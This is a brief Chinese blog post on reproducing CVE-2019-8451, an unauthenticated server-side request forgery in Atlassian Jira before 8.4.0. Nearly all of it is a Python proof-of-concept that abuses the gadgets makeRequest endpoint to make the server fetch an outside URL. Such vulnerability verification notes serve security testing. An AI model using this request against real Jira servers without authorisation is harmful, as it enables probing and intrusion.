# (CVE-2019-8451)Atlassian Jira 未授权SSRF漏洞验证
==========
一、漏洞简介
————
二、影响范围
————
Atlassian Jira \< 8.4.0 三、复现过程 ------------ Atlassian_Jira_未授权SSRF漏洞验证/img/rId24.png) > https://github.com/ianxtianxt/CVE-2019-8451
#coding:utf-8
import requests
host = ‘http://xx.xx.xx.xx:8080’
header = {
‘X-Atlassian-Token’: ‘no-check’,
‘Connection’: ‘close’
}
url = host + ‘/plugins/servlet/gadgets/makeRequest?url=’+host+’@www.baidu.com/’
html = requests.get(url = url,headers = header)
print html.text
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容